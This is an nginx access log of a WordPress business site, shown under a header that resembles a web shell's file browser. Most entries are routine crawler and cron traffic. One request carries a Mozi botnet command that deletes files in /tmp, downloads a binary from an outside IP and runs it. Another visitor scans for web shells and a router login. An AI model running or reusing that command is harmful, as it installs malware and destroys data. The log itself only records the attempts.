HEX
Server: nginx/1.16.1
System: Linux ecs-04358622 4.19.90-2107.6.0.0100.oe1.bclinux.x86_64 #1 SMP Wed Dec 1 19:59:44 CST 2021 x86_64
User: nginx (994)
PHP: 8.0.0
Disabled: NONE
Upload Files
File: //home/logs/cqqizhou_access_2025-09-07.log
36.133.115.36 - - [07/Sep/2025:00:15:54 +0800] "POST /wp-cron.php?doing_wp_cron=1757175354.6302011013031005859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [07/Sep/2025:00:16:23 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [07/Sep/2025:00:38:38 +0800] "POST /wp-cron.php?doing_wp_cron=1757176718.7009449005126953125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [07/Sep/2025:00:38:39 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [07/Sep/2025:00:43:04 +0800] "POST /wp-cron.php?doing_wp_cron=1757176984.3258728981018066406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.167.144.56 - - [07/Sep/2025:00:43:04 +0800] "GET /robots.txt HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.56 - - [07/Sep/2025:00:43:05 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [07/Sep/2025:00:49:29 +0800] "POST /wp-cron.php?doing_wp_cron=1757177369.0689539909362792968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.158 - - [07/Sep/2025:00:49:29 +0800] "GET / HTTP/1.1" 200 151919 "-" "Hello World/1.0"
36.133.115.36 - - [07/Sep/2025:01:01:54 +0800] "POST /wp-cron.php?doing_wp_cron=1757178114.4381999969482421875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [07/Sep/2025:01:01:55 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [07/Sep/2025:01:14:28 +0800] "POST /wp-cron.php?doing_wp_cron=1757178868.5144970417022705078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [07/Sep/2025:01:14:28 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
42.236.101.251 - - [07/Sep/2025:01:20:00 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
36.133.115.36 - - [07/Sep/2025:01:32:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757179935.7302711009979248046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
220.181.108.103 - - [07/Sep/2025:01:32:15 +0800] "GET /logistics HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.90 - - [07/Sep/2025:01:32:15 +0800] "GET /logistics/ HTTP/1.1" 200 22410 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.158 - - [07/Sep/2025:01:32:16 +0800] "GET /wp-content/uploads/2025/07/1751864682-Logistics800x500_2.webp HTTP/1.1" 200 27420 "http://cqqizhou.com/logistics/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.227 - - [07/Sep/2025:01:32:16 +0800] "GET /wp-content/uploads/2025/07/1751864664-Logistics800x500_1.webp HTTP/1.1" 200 76914 "http://cqqizhou.com/logistics/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.35 - - [07/Sep/2025:01:32:16 +0800] "GET /wp-content/uploads/2025/07/1753407887-Logistics_Banner2000%C3%97400px-%E6%8B%B7%E8%B4%9D.webp HTTP/1.1" 200 18866 "http://cqqizhou.com/logistics/" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
116.179.33.201 - - [07/Sep/2025:01:32:31 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
220.181.51.118 - - [07/Sep/2025:01:32:31 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
36.133.115.36 - - [07/Sep/2025:01:37:28 +0800] "POST /wp-cron.php?doing_wp_cron=1757180248.7500851154327392578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [07/Sep/2025:01:37:29 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [07/Sep/2025:01:47:57 +0800] "POST /wp-cron.php?doing_wp_cron=1757180877.2786719799041748046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [07/Sep/2025:01:47:57 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [07/Sep/2025:01:52:00 +0800] "POST /wp-cron.php?doing_wp_cron=1757181120.7597239017486572265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.159.33.43 - - [07/Sep/2025:01:52:00 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [07/Sep/2025:02:04:28 +0800] "POST /wp-cron.php?doing_wp_cron=1757181868.5047369003295898437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.69.194 - - [07/Sep/2025:02:04:29 +0800] "GET / HTTP/1.0" 200 151897 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [07/Sep/2025:02:14:10 +0800] "POST /wp-cron.php?doing_wp_cron=1757182450.2508668899536132812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.158 - - [07/Sep/2025:02:14:10 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 404 8990 "http://36.133.115.36:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
42.83.147.55 - - [07/Sep/2025:02:15:29 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/74.0.3729.169 Safari/537.36"
36.133.115.36 - - [07/Sep/2025:02:18:11 +0800] "POST /wp-cron.php?doing_wp_cron=1757182691.6468338966369628906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [07/Sep/2025:02:18:31 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [07/Sep/2025:02:18:52 +0800] "POST /wp-cron.php?doing_wp_cron=1757182732.7529239654541015625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
54.83.179.41 - - [07/Sep/2025:02:18:52 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
45.135.193.100 - - [07/Sep/2025:02:18:59 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [07/Sep/2025:02:21:03 +0800] "POST /wp-cron.php?doing_wp_cron=1757182863.1036689281463623046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
139.155.139.22 - - [07/Sep/2025:02:21:03 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
139.155.139.22 - - [07/Sep/2025:02:21:08 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
205.169.39.51 - - [07/Sep/2025:02:23:22 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:27 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:29 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1756373176" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:29 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:29 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:29 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:29 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
36.133.115.36 - - [07/Sep/2025:02:23:30 +0800] "POST /wp-cron.php?doing_wp_cron=1757183010.6933770179748535156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
205.169.39.51 - - [07/Sep/2025:02:23:30 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:32 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:33 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:33 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:34 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:34 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:34 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:34 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:35 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled.webp HTTP/1.1" 200 141034 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.51 - - [07/Sep/2025:02:23:35 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
36.133.115.36 - - [07/Sep/2025:02:44:57 +0800] "POST /wp-cron.php?doing_wp_cron=1757184296.9829599857330322265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [07/Sep/2025:02:44:57 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [07/Sep/2025:02:52:25 +0800] "POST /wp-cron.php?doing_wp_cron=1757184745.2178609371185302734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [07/Sep/2025:02:52:25 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [07/Sep/2025:03:08:17 +0800] "POST /wp-cron.php?doing_wp_cron=1757185697.2595620155334472656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.16.140 - - [07/Sep/2025:03:08:17 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [07/Sep/2025:03:14:03 +0800] "POST /wp-cron.php?doing_wp_cron=1757186043.7336659431457519531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
79.117.72.189 - - [07/Sep/2025:03:14:03 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://79.117.67.166:58196/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 301 5 "-" "Hello, world"
194.187.178.100 - - [07/Sep/2025:03:14:26 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0"
36.133.115.36 - - [07/Sep/2025:03:22:28 +0800] "POST /wp-cron.php?doing_wp_cron=1757186548.1919538974761962890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [07/Sep/2025:03:22:28 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.131.26.226 - - [07/Sep/2025:03:24:21 +0800] "GET /material.html HTTP/1.1" 200 6459 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
4.185.125.114 - - [07/Sep/2025:03:25:26 +0800] "GET /dropdown.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:26 +0800] "GET /makeasmtp.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:26 +0800] "GET /wp-sigunq.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:26 +0800] "GET /wso112233.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:27 +0800] "GET /alfanew.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:27 +0800] "GET /fw.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:27 +0800] "GET /install.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [07/Sep/2025:03:25:28 +0800] "POST /wp-cron.php?doing_wp_cron=1757186728.3365499973297119140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
4.185.125.114 - - [07/Sep/2025:03:25:28 +0800] "GET /wp-login.php HTTP/1.1" 200 8672 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:28 +0800] "GET /chosen.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:28 +0800] "GET /simple.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:29 +0800] "GET /inputs.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:29 +0800] "GET /classsmtps.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:30 +0800] "GET /wp-blog-header.php HTTP/1.1" 404 5 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:30 +0800] "GET /wp-trackback.php HTTP/1.1" 404 140 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:31 +0800] "GET /wp-signup.php HTTP/1.1" 302 5 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:32 +0800] "GET /wp-login.php?action=register HTTP/1.1" 302 5 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:33 +0800] "GET /wp-login.php?registration=disabled HTTP/1.1" 200 8853 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:33 +0800] "GET /wp-comments-post.php HTTP/1.1" 405 5 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:33 +0800] "GET /wp-cron.php HTTP/1.1" 200 5 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:34 +0800] "GET /wp-load.php HTTP/1.1" 200 5 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:35 +0800] "GET /wp-mail.php HTTP/1.1" 403 2517 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:35 +0800] "GET /edit.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:35 +0800] "GET /wp-activate.php HTTP/1.1" 302 5 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:36 +0800] "GET /wp-login.php?action=register HTTP/1.1" 302 5 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:37 +0800] "GET /wp-login.php?registration=disabled HTTP/1.1" 200 8853 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:37 +0800] "GET /plugins.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:37 +0800] "GET /post.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:38 +0800] "GET /admin.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:38 +0800] "GET /about.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:38 +0800] "GET /wp-2019.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:38 +0800] "GET /geju.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:38 +0800] "GET /wp.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:39 +0800] "GET /hoot.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:39 +0800] "GET /css.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:39 +0800] "GET /log.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:39 +0800] "GET /mail.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:40 +0800] "GET /bak.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:40 +0800] "GET /content.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:40 +0800] "GET /upfile.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:40 +0800] "GET /wp-conflg.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:40 +0800] "GET /bypass.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:41 +0800] "GET /404.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:41 +0800] "GET /updates.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:41 +0800] "GET /radio.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:41 +0800] "GET /xmrlpc.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:42 +0800] "GET /ae.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:42 +0800] "GET /moon.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:42 +0800] "GET /blog.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:42 +0800] "GET /themes.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:42 +0800] "GET /ini.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:43 +0800] "GET /as.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:43 +0800] "GET /shell.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:43 +0800] "GET /ws.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:43 +0800] "GET /aa.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:43 +0800] "GET /akc.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:44 +0800] "GET /alfa.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:44 +0800] "GET /asasx.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:44 +0800] "GET /atomlib.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:44 +0800] "GET /autoload_classmap.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:45 +0800] "GET /autoload_classmap/function.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:45 +0800] "GET /buy.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:45 +0800] "GET /classwithtostring.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:45 +0800] "GET /cong.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:45 +0800] "GET /file.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:46 +0800] "GET /file2.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:46 +0800] "GET /flower.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:46 +0800] "GET /gecko.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:46 +0800] "GET /goat.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:47 +0800] "GET /goods.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:47 +0800] "GET /ioxi-o.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:47 +0800] "GET /lock360.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:47 +0800] "GET /mm.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:47 +0800] "GET /nc4.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:48 +0800] "GET /tinyfilemanager.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:48 +0800] "GET /users.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:48 +0800] "GET /w.php HTTP/1.1" 404 27 "-" "-"
36.133.115.36 - - [07/Sep/2025:03:25:49 +0800] "POST /wp-cron.php?doing_wp_cron=1757186749.3779740333557128906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
4.185.125.114 - - [07/Sep/2025:03:25:49 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:50 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 8672 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:50 +0800] "GET /wp-admin/css/colors/blue/index.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:50 +0800] "GET /wp-admin/images/moon.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:50 +0800] "GET /wp-admin/js/index.php HTTP/1.1" 404 27 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:51 +0800] "GET /wp-admin/setup-config.php HTTP/1.1" 409 2667 "-" "-"
4.185.125.114 - - [07/Sep/2025:03:25:51 +0800] "GET /wp-api.php HTTP/1.1" 404 27 "-" "-"
